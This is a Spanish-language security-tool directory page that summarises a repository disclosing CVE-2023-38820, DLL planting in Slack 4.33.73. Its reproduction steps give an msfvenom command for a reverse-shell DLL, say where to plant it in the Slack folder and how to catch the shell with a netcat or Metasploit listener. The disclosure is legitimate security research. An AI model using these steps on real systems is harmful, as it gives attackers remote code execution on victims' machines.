Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
DLL-Planting-Slack-4.33.73-CVE-2023-38820 — Plantación de DLL en Slack 4.33.73 - CVE-2023-38820 | Kitploit
Herramientas/GitHubGitHub/trailer2/dll-planting-slack-4.33.73-cve-2023-38820
Escalada de PrivilegiosAnálisis de VulnerabilidadesExplotaciónMovimiento LateralPost-ExplotaciónDesarrollo de PayloadsExplotación de Binarios
GitHubtrailer2/dll-planting-slack-4.33.73-cve-2023-38820

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

DLL-Planting-Slack-4.33.73-CVE-2023-38820

Plantación de DLL en Slack 4.33.73 - CVE-2023-38820

Ver Repositorio
hace 3 añosAún no revisado

DLL-Planting-Slack-4.33.73-CVE-2023-38820

DLL Planting en Slack 4.33.73 - CVE-2023-38820 Descubridor: Idan Malihi

Descripción

Un problema en Slack v.4.33.73 permite a un atacante local ejecutar código arbitrario mediante el mecanismo de carga de DLL en los archivos profapi.dll, CRYPTBASE.dll, KBDUS.DLL, DPAPI.dll, MSASN1.dll, mf.dll, mfplat.dll y RTWorkQ.DLL.

Pasos para Reproducir

Para explotar la vulnerabilidad, un atacante debe descargar e instalar el programa Slack y seguir los pasos:

  1. Crear un archivo dll malicioso con msfvenom: msfvenom -p windows/x64/shell_reverse_tcp LHOST=IP LPORT=PORT -f dll -o profapi.dll
  2. Transferir el archivo dll malicioso al equipo de la víctima
  3. Abrir la ruta de Slack: "C:\Users\idan.m\AppData\Local\slack\app-4.33.73"
  4. Transferir el dll malicioso a la ruta de Slack y nombrarlo "KBDUS.DLL", por ejemplo.
  5. Abrir un listener de netcat o metasploit
  6. Abrir Slack.exe
  7. Obtener una reverse shell.
Descargar herramienta